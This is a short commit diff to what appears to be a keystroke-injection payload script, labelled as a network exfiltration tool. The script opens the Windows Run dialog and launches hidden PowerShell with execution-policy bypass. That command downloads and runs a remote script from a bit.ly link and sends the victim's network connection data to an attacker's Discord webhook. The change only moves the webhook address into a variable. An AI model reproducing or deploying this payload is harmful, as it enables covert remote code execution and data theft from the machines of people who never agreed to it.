DEFINE Discord Webhook
parent
3537551291
commit
f4e7e520d6
|
@ -28,8 +28,14 @@ REM Category: Net, Exfiltration
|
|||
REM Requirements: Internet connection
|
||||
REM
|
||||
|
||||
REM REQUIRED - Provide your Discord WEBHOOK
|
||||
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
STRINGLN powershell -w h -ep bypass $discord='<your-webhook-here>';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/Windows-netstat | iex
|
||||
DELETE
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
STRING WEBHOOK
|
||||
STRING';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm bit.ly/Windows-netstat | iex
|
||||
ENTER
|
||||
|
|
Loading…
Reference in New Issue